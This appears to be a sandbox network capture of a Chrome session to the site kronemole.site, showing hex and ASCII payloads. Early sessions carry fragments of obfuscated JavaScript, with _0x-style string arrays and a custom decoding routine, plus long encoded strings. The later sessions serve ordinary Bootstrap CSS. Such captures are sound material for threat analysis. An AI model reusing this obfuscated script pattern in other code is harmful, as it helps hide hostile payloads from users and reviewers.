                                                                          2023-11-21 16:58:39 UTC62INData Raw: 41 72 75 6e 41 6e 6c 41 72 75 72 41 72 6e 75 41 72 6e 47 41 72 6e 75 41 72 54 6d 41 53 6e 41 72 75 6d 41 72 54 47 41 72 54 6e 41 72 75 6e 41 6e 6c 41 72 75 72 41 72 6e 75 41 72 6e 47 41 72 6e 75 41 72 54 6d 41 53 6e 41 72 75 6d 41 72 75 75 41 6e 6c 41 72 6e 6e 41 72 54 6d 41 72 75 54 41 72 6e 6c 41 72 53 54 41 72 54 6d 41 72 54 54 41 72 53 47 41 75 6d 41 53 6e 41 72 75 47 41 72 53 54 41 72 54 47 41 72 53 54 41 6e 6c 41 72 75 47 41 72 75 54 41 72 54 72 41 72 6e 6c 41 72 75 54 41 72 54 72 41 72 54 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 72 6e 6c 41 72 6e 75 41 72 75 47 41 72 53 54 41 72 6e 47 41 72 53 47 41 75 6d 41 53 6e 41 72 6e 75 41 72 6e 53 41 72 75 72 41 72 6e 47 41 72 75 54 41 72 75 72 41 72 6e 72 41 72 6d 6c 41 72 53 47 41 75 6d 41 75 6e 41 72 54 72
                                                                          Data Ascii: ArunAnlArurArnuArnGArnuArTmASnArumArTGArTnArunAnlArurArnuArnGArnuArTmASnArumAruuAnlArnnArTmAruTArnlArSTArTmArTTArSGAumASnAruGArSTArTGArSTAnlAruGAruTArTrArnlAruTArTrArTrArmlArSGAumArnlArnuAruGArSTArnGArSGAumASnArnuArnSArurArnGAruTArurArnrArmlArSGAumAunArTr
                                                                          2023-11-21 16:58:39 UTC64INData Raw: 75 76 77 78 79 7a 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 2b 2f 22 2c 22 73 6c 69 63 65 22 2c 22 69 6e 64 65 78 4f 66 22 2c 22 22 2c 22 22 2c 22 2e 22 2c 22 70 6f 77 22 2c 22 72 65 64 75 63 65 22 2c 22 72 65 76 65 72 73 65 22 2c 22 30 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 38 39 63 28 64 2c 65 2c 66 29 7b 76 61 72 20 67 3d 5f 30 78 63 32 30 65 5b 32 5d 5b 5f 30 78 63 32 30 65 5b 31 5d 5d 28 5f 30 78 63 32 30 65 5b 30 5d 29 3b 76 61 72 20 68 3d 67 5b 5f 30 78 63 32 30 65 5b 33 5d 5d 28 30 2c 65 29 3b 76 61 72 20 69 3d 67 5b 5f 30 78 63 32 30 65 5b 33 5d 5d 28 30 2c 66 29 3b 76 61 72 20 6a 3d 64 5b 5f 30 78 63 32 30 65 5b 31 5d 5d 28 5f 30 78 63 32 30 65 5b 30 5d 29 5b 5f 30 78 63 32 30 65 5b 31 30 5d 5d 28 29
                                                                          Data Ascii: uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe89c(d,e,f){var g=_0xc20e[2][_0xc20e[1]](_0xc20e[0]);var h=g[_0xc20e[3]](0,e);var i=g[_0xc20e[3]](0,f);var j=d[_0xc20e[1]](_0xc20e[0])[_0xc20e[10]]()
                                                                          2023-11-21 16:58:39 UTC68INData Raw: 64 2c 65 2c 66 29 7b 76 61 72 20 67 3d 5f 30 78 63 37 33 65 5b 32 5d 5b 5f 30 78 63 37 33 65 5b 31 5d 5d 28 5f 30 78 63 37 33 65 5b 30 5d 29 3b 76 61 72 20 68 3d 67 5b 5f 30 78 63 37 33 65 5b 33 5d 5d 28 30 2c 65 29 3b 76 61 72 20 69 3d 67 5b 5f 30 78 63 37 33 65 5b 33 5d 5d 28 30 2c 66 29 3b 76 61 72 20 6a 3d 64 5b 5f 30 78 63 37 33 65 5b 31 5d 5d 28 5f 30 78 63 37 33 65 5b 30 5d 29 5b 5f 30 78 63 37 33 65 5b 31 30 5d 5d 28 29 5b 5f 30 78 63 37 33 65 5b 39 5d 5d 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 68 5b 5f 30 78 63 37 33 65 5b 34 5d 5d 28 62 29 21 3d 3d 2d 31 29 72 65 74 75 72 6e 20 61 2b 3d 68 5b 5f 30 78 63 37 33 65 5b 34 5d 5d 28 62 29 2a 28 4d 61 74 68 5b 5f 30 78 63 37 33 65 5b 38 5d 5d 28 65 2c 63 29 29 7d 2c 30 29 3b 76 61
                                                                          Data Ascii: d,e,f){var g=_0xc73e[2][_0xc73e[1]](_0xc73e[0]);var h=g[_0xc73e[3]](0,e);var i=g[_0xc73e[3]](0,f);var j=d[_0xc73e[1]](_0xc73e[0])[_0xc73e[10]]()[_0xc73e[9]](function(a,b,c){if(h[_0xc73e[4]](b)!==-1)return a+=h[_0xc73e[4]](b)*(Math[_0xc73e[8]](e,c))},0);va
                                                                          2023-11-21 16:58:39 UTC72INData Raw: 68 45 45 78 68 68 68 45 68 45 45 78 68 45 45 45 45 68 78 68 68 68 68 68 45 78 68 45 45 45 45 68 78 68 68 45 45 45 68 78 68 68 68 68 45 45 78 68 45 45 45 45 68 78 68 68 68 45 68 68 68 78 68 68 45 45 45 68 45 78 68 68 68 45 45 68 68 78 68 45 45 45 45 68 78 68 68 45 45 68 45 45 78 68 68 45 68 45 45 68 78 68 68 45 45 68 68 45 78 68 68 45 45 68 68 45 78 68 68 68 45 45 68 68 78 68 68 68 45 68 45 45 78 68 68 68 45 68 45 68 78 68 68 68 68 45 45 68 78 68 45 45 45 45 68 78 68 68 68 68 68 45 78 68 45 45 45 45 68 78 68 45 68 45 45 45 78 68 45 68 45 45 45 78 68 68 68 68 45 45 78 68 45 45 45 45 68 78 68 68 68 45 68 68 68 78 68 68 45 45 45 68 45 78 68 68 68 45 45 68 68 78 68 45 45 45 45 68 78 68 68 68 45 68 45 68 78 68 68 68 68 45 45 68 78 68 68 68 45 68 45 68 78 68 45
                                                                          Data Ascii: hEExhhhEhEExhEEEEhxhhhhhExhEEEEhxhhEEEhxhhhhEExhEEEEhxhhhEhhhxhhEEEhExhhhEEhhxhEEEEhxhhEEhEExhhEhEEhxhhEEhhExhhEEhhExhhhEEhhxhhhEhEExhhhEhEhxhhhhEEhxhEEEEhxhhhhhExhEEEEhxhEhEEExhEhEEExhhhhEExhEEEEhxhhhEhhhxhhEEEhExhhhEEhhxhEEEEhxhhhEhEhxhhhhEEhxhhhEhEhxhE
                                                                          2023-11-21 16:58:39 UTC73INData Raw: 62 66 37 0d 0a 68 78 68 68 68 45 45 68 68 78 68 68 68 45 45 45 45 78 68 68 45 68 45 45 45 78 68 45 45 45 45 68 78 68 68 68 68 68 68 78 68 45 45 45 45 68 78 68 68 45 45 45 68 78 68 45 45 45 45 68 78 68 45 45 68 68 68 78 68 45 45 68 68 68 78 68 45 45 45 45 68 78 68 68 68 45 45 45 68 78 68 68 68 45 45 68 68 78 68 68 68 45 45 45 45 78 68 68 45 68 45 45 45 78 68 45 45 45 45 68 78 68 68 68 68 45 68 78 68 45 45 45 45 68 78 68 68 45 45 68 68 78 68 68 45 68 68 45 78 68 45 68 45 68 45 78 68 45 45 45 45 68 78 68 68 68 68 68 45 45 78 68 45 45 45 45 68 78 68 68 68 45 68 45 68 78 68 68 68 68 45 45 68 78 68 68 68 45 68 45 68 78 68 45 45 45 45 68 78 68 68 68 68 68 45 78 68 45 45 45 45 68 78 68 45 45 45 68 68 78 68 45 68 68 68 45 78 68 45 45 45 45 68 78 68 45 68 68 45 45
                                                                          Data Ascii: bf7hxhhhEEhhxhhhEEEExhhEhEEExhEEEEhxhhhhhhxhEEEEhxhhEEEhxhEEEEhxhEEhhhxhEEhhhxhEEEEhxhhhEEEhxhhhEEhhxhhhEEEExhhEhEEExhEEEEhxhhhhEhxhEEEEhxhhEEhhxhhEhhExhEhEhExhEEEEhxhhhhhEExhEEEEhxhhhEhEhxhhhhEEhxhhhEhEhxhEEEEhxhhhhhExhEEEEhxhEEEhhxhEhhhExhEEEEhxhEhhEE
                                                                          2023-11-21 16:58:39 UTC76INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.449748104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:40 UTC76OUTGET /assets/js/vendor/bootstrap/css/bootstrap.min.css HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:40 UTC80INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:40 GMT
                                                                          Content-Type: text/css
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:43:43 GMT
                                                                          last-modified: Tue, 23 Mar 2021 22:52:06 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 897
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zeeTc1FbwHXX9fmrlkvAsw9qorxmMgd7ybCHF6ocGnY4x1FL69tIklbVwECK5k%2FLdX5p7keRkcdaY7vlA87uHk3EUlleI1h3y%2FaUr6qAl9l%2BNPUJxTMiTBggOTPannVu6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a91ff2728a6-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:40 UTC80INData Raw: 37 63 36 66 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30
                                                                          Data Ascii: 7c6f/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */:root{--blue:#007bff;--indigo:#6610
                                                                          2023-11-21 16:58:40 UTC81INData Raw: 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 70 78 3b 2d 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 2d 73 61 6e 73 2d 73 65 72 69 66 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 22 53 65 67 6f 65 20 55 49 22 2c 52 6f 62 6f 74 6f 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 22 41 70 70 6c 65 20
                                                                          Data Ascii: --light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple
                                                                          2023-11-21 16:58:40 UTC82INData Raw: 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 64 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 72 65 6d 7d 64 66 6e 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 7d 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62
                                                                          Data Ascii: tom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:b
                                                                          2023-11-21 16:58:40 UTC84INData Raw: 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 2c 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d
                                                                          Data Ascii: size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-
                                                                          2023-11-21 16:58:40 UTC85INData Raw: 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 36 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 64 69 73 70 6c 61 79 2d 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65
                                                                          Data Ascii: rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:6rem;font-weight:300;line-height:1.2}.display-2{font-size:5.5rem;font-we
                                                                          2023-11-21 16:58:40 UTC86INData Raw: 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 65 38 33 65 38 63 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 6b 62 64 20 6b 62 64 7b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 32
                                                                          Data Ascii: size:87.5%;color:#e83e8c;word-break:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:100%;font-weight:700}pre{display:block;font-size:87.5%;color:#2
                                                                          2023-11-21 16:58:40 UTC88INData Raw: 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 63 6f 6c 2d 73 6d 2d 37 2c 2e 63 6f 6c 2d 73 6d 2d 38 2c 2e 63 6f 6c 2d 73 6d 2d 39 2c 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 78 6c 2c 2e 63 6f 6c 2d 78 6c 2d 31 2c 2e 63 6f 6c 2d 78 6c 2d 31 30 2c 2e 63 6f 6c 2d 78 6c 2d 31 31 2c 2e 63 6f 6c 2d 78 6c 2d 31 32 2c 2e 63 6f 6c 2d 78 6c 2d 32 2c 2e 63 6f 6c 2d 78
                                                                          Data Ascii: ,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-auto,.col-xl,.col-xl-1,.col-xl-10,.col-xl-11,.col-xl-12,.col-xl-2,.col-x
                                                                          2023-11-21 16:58:40 UTC89INData Raw: 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72
                                                                          Data Ascii: 0{-webkit-box-flex:0;-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.or
                                                                          2023-11-21 16:58:40 UTC90INData Raw: 65 74 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 36 37 25 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6c 2d 73 6d 7b 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 65 64 2d 73 69 7a 65 3a 30 3b 66 6c 65 78 2d 62 61 73 69 73 3a 30 3b 2d 77
                                                                          Data Ascii: et-6{margin-left:50%}.offset-7{margin-left:58.333333%}.offset-8{margin-left:66.666667%}.offset-9{margin-left:75%}.offset-10{margin-left:83.333333%}.offset-11{margin-left:91.666667%}@media (min-width:576px){.col-sm{-ms-flex-preferred-size:0;flex-basis:0;-w
                                                                          2023-11-21 16:58:40 UTC92INData Raw: 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 73 6d 2d 66 69 72 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 6c 61 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 31 34 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72
                                                                          Data Ascii: 1.666667%}.col-sm-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-sm-first{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.order-sm-last{-webkit-box-ordinal-group:14;-ms-flex-order:13;order:13}.order-sm-0{-webkit-box-or
                                                                          2023-11-21 16:58:40 UTC93INData Raw: 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 36 37 25 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 7b 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 65 64 2d 73 69 7a 65 3a 30 3b 66 6c 65 78 2d 62 61 73 69 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 31 3b 2d 6d 73 2d 66 6c 65 78 2d 70 6f 73 69 74 69 76 65 3a 31 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 78 2d 77 69 64 74 68 3a
                                                                          Data Ascii: n-left:66.666667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.333333%}.offset-sm-11{margin-left:91.666667%}}@media (min-width:768px){.col-md{-ms-flex-preferred-size:0;flex-basis:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;max-width:
                                                                          2023-11-21 16:58:40 UTC94INData Raw: 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 6d 64 2d 66 69 72 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 6d 64 2d 6c 61 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 31 34 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 6d 64 2d 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 31 3b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 6d 64 2d 31 7b 2d 77 65 62 6b 69 74 2d
                                                                          Data Ascii: lex:0 0 100%;max-width:100%}.order-md-first{-webkit-box-ordinal-group:0;-ms-flex-order:-1;order:-1}.order-md-last{-webkit-box-ordinal-group:14;-ms-flex-order:13;order:13}.order-md-0{-webkit-box-ordinal-group:1;-ms-flex-order:0;order:0}.order-md-1{-webkit-
